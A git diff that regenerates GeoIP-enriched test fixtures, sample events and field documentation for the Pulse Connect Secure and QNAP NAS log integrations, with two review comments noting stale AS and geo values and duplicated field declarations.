@@ -632,22 +680,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "tags": [ 
@@ -669,26 +720,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677724498Z", - "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "ingested": "2021-12-14T14:54:27.270282025Z", + "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:49:40.000+02:00", 
@@ -711,22 +765,25 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", "tags": [ 
@@ -754,26 +811,29 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677727411Z", - "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", + "ingested": "2021-12-14T14:54:27.270282405Z", + "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", "timezone": "+02:00", "created": "2021-10-19T09:49:40.000+02:00", "kind": "event", 
@@ -798,24 +858,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "message": "Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "tags": [ "preserve_original_event" ], 
@@ -835,26 +898,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677730334Z", - "original": "Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [55.53.160.32] user.name()[] - Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "ingested": "2021-12-14T14:54:27.270282796Z", + "original": "Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [89.160.20.156] user.name()[] - Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:49:41.000+02:00", 
@@ -874,22 +940,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", "tags": [ 
@@ -911,26 +980,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677733390Z", - "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", + "ingested": "2021-12-14T14:54:27.270283373Z", + "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:19.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml b/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml index 0f42cec2ae9..96325469a85 100644 --- a/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml +++ b/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml 
@@ -10,6 +10,12 @@ name: client.as.number - external: ecs name: client.as.organization.name +- external: ecs + name: client.geo.region_iso_code +- external: ecs + name: client.geo.region_name +- external: ecs + name: client.geo.city_name - external: ecs name: client.geo.continent_name - external: ecs @@ -20,6 +26,26 @@ level: core name: client.geo.location type: geo_point +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name +- external: ecs + name: source.geo.continent_name +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.geo.region_iso_code +- external: ecs + name: source.geo.region_name +- external: ecs + name: source.geo.city_name +- external: ecs + name: source.geo.country_name +- description: Longitude and latitude. + level: core + name: source.geo.location + type: geo_point - external: ecs name: client.ip - external: ecs diff --git a/packages/pulse_connect_secure/data_stream/log/sample_event.json b/packages/pulse_connect_secure/data_stream/log/sample_event.json index 88c7468ad3a..32f6bd915ce 100644 --- a/packages/pulse_connect_secure/data_stream/log/sample_event.json +++ b/packages/pulse_connect_secure/data_stream/log/sample_event.json @@ -9,7 +9,7 @@ "version": "7.16.0" }, "client": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -25,7 +25,7 @@ "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "data_stream": { "dataset": "pulse_connect_secure.log", 
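Review bot: The second ecs.yml hunk (`@@ -20,6 +26,26 @@`) declares source.as.number, source.as.organization.name, source.geo.continent_name, source.geo.country_iso_code, source.geo.country_name and source.geo.location as new entries, yet the README.md hunk `@@ -195,10 +198,13 @@` lists exactly those fields as unchanged context, so they appear to have been exported from another fields file of this data stream already; if that is the case only region_iso_code, region_name and city_name are genuinely new and the rest duplicate an existing declaration. Worth checking the other fields/*.yml files before merging, and if this is meant as a move rather than an addition, the old declarations should be dropped in the same change. A smaller style point: the new source.* block is inserted between client.geo.location and client.ip, splitting the client.* group; placing it after the last client entry keeps the file grouped by field set as it was.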
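Review bot: The sample event becomes internally inconsistent: the `@@ -9,7 +9,7 @@` hunk of sample_event.json rewrites client.address to 89.160.20.156, but the enclosing client.as block still carries `"number": 328` and `"name": "DoD Network Information Center"`, and the `@@ -25,7 +25,7 @@` hunk keeps `"lon": -97.822`, whereas the regenerated pipeline fixtures earlier in this diff resolve the same address to AS 29518 / Bredband2 AB / Sweden. It looks like the IP was substituted by search-and-replace rather than by regenerating the sample (the `@@ -47,7 +47,7 @@` hunk also keeps event.ingested at its 2021-12-08 value). Regenerating sample_event.json from the system test, or at minimum updating the as and geo blocks on both client and source to the new enrichment output, keeps the documented example truthful; README.md is rendered from this sample and its hunks carry the same stale values.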
@@ -47,7 +47,7 @@ "dataset": "pulse_connect_secure.log", "ingested": "2021-12-08T13:55:56Z", "kind": "event", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", "timezone": "+02:00" }, @@ -62,7 +62,7 @@ "address": "172.31.0.7:53480" } }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "observer": { "ip": "10.5.2.3", "name": "pcs-node1", @@ -78,7 +78,7 @@ } }, "source": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -94,7 +94,7 @@ "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event", diff --git a/packages/pulse_connect_secure/docs/README.md b/packages/pulse_connect_secure/docs/README.md index 2634a38bfd0..ff2a8580605 100644 --- a/packages/pulse_connect_secure/docs/README.md +++ b/packages/pulse_connect_secure/docs/README.md 
@@ -18,7 +18,7 @@ An example event for `log` looks as following: "version": "7.16.0" }, "client": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -34,7 +34,7 @@ An example event for `log` looks as following: "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "data_stream": { "dataset": "pulse_connect_secure.log", @@ -56,7 +56,7 @@ An example event for `log` looks as following: "dataset": "pulse_connect_secure.log", "ingested": "2021-12-08T13:55:56Z", "kind": "event", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", "timezone": "+02:00" }, @@ -71,7 +71,7 @@ An example event for `log` looks as following: "address": "172.31.0.7:53480" } }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "observer": { "ip": "10.5.2.3", "name": "pcs-node1", 
@@ -87,7 +87,7 @@ An example event for `log` looks as following: } }, "source": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -103,7 +103,7 @@ An example event for `log` looks as following: "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event", @@ -136,10 +136,13 @@ An example event for `log` looks as following: | client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | client.as.organization.name | Organization name. | keyword | +| client.geo.city_name | City name. | keyword | | client.geo.continent_name | Name of the continent. | keyword | | client.geo.country_iso_code | Country ISO code. | keyword | | client.geo.country_name | Country name. | keyword | | client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | | client.ip | IP address of the client (IPv4 or IPv6). | ip | | client.nat.ip | Translated IP of source based NAT sessions (e.g. internal client to internet). Typically connections traversing load balancers, firewalls, or routers. | ip | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | 
@@ -195,10 +198,13 @@ An example event for `log` looks as following: | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | +| source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | | source.geo.country_iso_code | Country ISO code. | keyword | | source.geo.country_name | Country name. | keyword | | source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | | source.ip | IP address of the source (IPv4 or IPv6). | ip | | source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip | | tags | List of keywords used to tag each event. | keyword |
diff --git a/packages/pulse_connect_secure/manifest.yml b/packages/pulse_connect_secure/manifest.yml
index ca7df03d7e4..8ec5e067983 100644
--- a/packages/pulse_connect_secure/manifest.yml
+++ b/packages/pulse_connect_secure/manifest.yml
@@ -1,6 +1,6 @@
 name: pulse_connect_secure
 title: Pulse Connect Secure
-version: 0.0.1
+version: 0.0.2
 release: experimental
 description: Collect logs from Pulse Connect Secure with Elastic Agent.
 type: integration
diff --git a/packages/qnap_nas/changelog.yml b/packages/qnap_nas/changelog.yml
index 2a06c2635bc..f985a886963 100644
--- a/packages/qnap_nas/changelog.yml
+++ b/packages/qnap_nas/changelog.yml
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: initial release diff --git a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json index a2334217552..cbcab608721 100644 --- a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json @@ -53,7 +53,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371354597Z", + "ingested": "2021-12-14T14:54:30.319623016Z", "original": "\u003c30\u003eOct 30 20:24:24 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/New folder, Action: Create Directory", "provider": "conn-log", "timezone": "-05:00", @@ -118,7 +118,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371379473Z", + "ingested": "2021-12-14T14:54:30.319633366Z", "original": "\u003c30\u003eOct 30 20:24:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: ---, Action: Login Fail", "provider": "conn-log", "timezone": "-05:00", @@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371385906Z", + "ingested": "2021-12-14T14:54:30.319634156Z", "original": "\u003c30\u003eOct 30 20:35:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: ---, Action: Login Success", "provider": "conn-log", "timezone": "-05:00", 
@@ -247,7 +247,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371391494Z", + "ingested": "2021-12-14T14:54:30.319634760Z", "original": "\u003c30\u003eNov 21 14:42:18 qnap-nas01 qulogd[14387]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Connection type: HTTP/HTTPS, Accessed resources: Administration, Action: Login Success", "provider": "conn-log", "timezone": "-05:00", @@ -313,7 +313,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371397004Z", + "ingested": "2021-12-14T14:54:30.319649046Z", "original": "\u003c30\u003eOct 30 20:35:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: HTTP/HTTPS, Accessed resources: ---, Action: Logout", "provider": "conn-log", "timezone": "-05:00", @@ -381,7 +381,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371402287Z", + "ingested": "2021-12-14T14:54:30.319650035Z", "original": "\u003c30\u003eOct 30 20:24:30 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Connection type: HTTP/HTTPS, Accessed resources: [File Station] /Browser Station/admin, Action: Read", "provider": "conn-log", "timezone": "-05:00", @@ -447,7 +447,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371407486Z", + "ingested": "2021-12-14T14:54:30.319650763Z", "original": "\u003c30\u003eOct 30 20:24:30 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/New folder -\u003e path/to/files/asdf, Action: Rename", "provider": "conn-log", "timezone": "-05:00", 
@@ -518,7 +518,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371417637Z", + "ingested": "2021-12-14T14:54:30.319651371Z", "original": "\u003c30\u003eOct 30 20:24:33 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/asdf, Action: Delete", "provider": "conn-log", "timezone": "-05:00", @@ -590,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371423088Z", + "ingested": "2021-12-14T14:54:30.319651997Z", "original": "\u003c30\u003eOct 30 20:43:19 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/picture.jpg, Action: Read", "provider": "conn-log", "timezone": "-05:00", @@ -662,7 +662,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371428153Z", + "ingested": "2021-12-14T14:54:30.319652532Z", "original": "\u003c30\u003eOct 30 20:43:19 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/picture.jpg, Action: Add", "provider": "conn-log", "timezone": "-05:00", diff --git a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json index 0628f65ddd0..a6ebd2db5b0 100644 --- a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json +++ b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json 
@@ -38,7 +38,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383683415Z", + "ingested": "2021-12-14T14:54:31.222784822Z", "original": "\u003c28\u003eOct 30 20:28:41 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Infrastructure, Content: [Network \u0026 Virtual Switch] Interface \"Adapter 2\" disconnected.", "provider": "event-log", "timezone": "-05:00", @@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383697291Z", + "ingested": "2021-12-14T14:54:31.222787899Z", "original": "\u003c30\u003eOct 30 20:29:32 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Infrastructure, Content: [Network \u0026 Virtual Switch] Interface \"Adapter 2\" connected.", "provider": "event-log", "timezone": "-05:00", @@ -144,7 +144,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383701935Z", + "ingested": "2021-12-14T14:54:31.222788341Z", "original": "\u003c30\u003eOct 30 20:29:32 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: External Device, Category: UPS, Content: [External Device] UPS power restored. Canceled autoprotection mode..", "provider": "event-log", "timezone": "-05:00", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383706223Z", + "ingested": "2021-12-14T14:54:31.222788788Z", "original": "\u003c30\u003eOct 30 20:32:25 qnap-nas01 qulogd[14629]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Static Route, Content: [Network \u0026 Virtual Switch] Added static route. Interface: , Destination: 5.5.5.0.", "provider": "event-log", "timezone": "-05:00", 
@@ -264,7 +264,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383710523Z", + "ingested": "2021-12-14T14:54:31.222789145Z", "original": "\u003c30\u003eOct 30 20:34:22 qnap-nas01 qulogd[14629]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Static Route, Content: [Network \u0026 Virtual Switch] Removed static route. Interface: , Destination: 5.5.5.0.", "provider": "event-log", "timezone": "-05:00", @@ -330,7 +330,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383714793Z", + "ingested": "2021-12-14T14:54:31.222789504Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Shared Folders, Category: General, Content: [Shared Folders] Created shared folder \"abcd\".", "provider": "event-log", "timezone": "-05:00", @@ -399,7 +399,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383719053Z", + "ingested": "2021-12-14T14:54:31.222789845Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Shared Folders, Category: General, Content: [Shared Folders] Deleted shared folder \"abcd\".", "provider": "event-log", "timezone": "-05:00", @@ -462,7 +462,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383723223Z", + "ingested": "2021-12-14T14:54:31.222790189Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: User Groups, Category: General, Content: [User Groups] Deleted user group \"test1\".", "provider": "event-log", "timezone": "-05:00", 
@@ -529,7 +529,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383727367Z", + "ingested": "2021-12-14T14:54:31.222790658Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: User Groups, Category: General, Content: [User Groups] Created user group \"test1\".", "provider": "event-log", "timezone": "-05:00", @@ -596,7 +596,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383731564Z", + "ingested": "2021-12-14T14:54:31.222791107Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Changed the password of user \"test\".", "provider": "event-log", "timezone": "-05:00", @@ -664,7 +664,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383735816Z", + "ingested": "2021-12-14T14:54:31.222791551Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Edited the account profile of user \"test\".", "provider": "event-log", "timezone": "-05:00", @@ -732,7 +732,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383740296Z", + "ingested": "2021-12-14T14:54:31.222792136Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Created user \"test\".", "provider": "event-log", "timezone": "-05:00", 
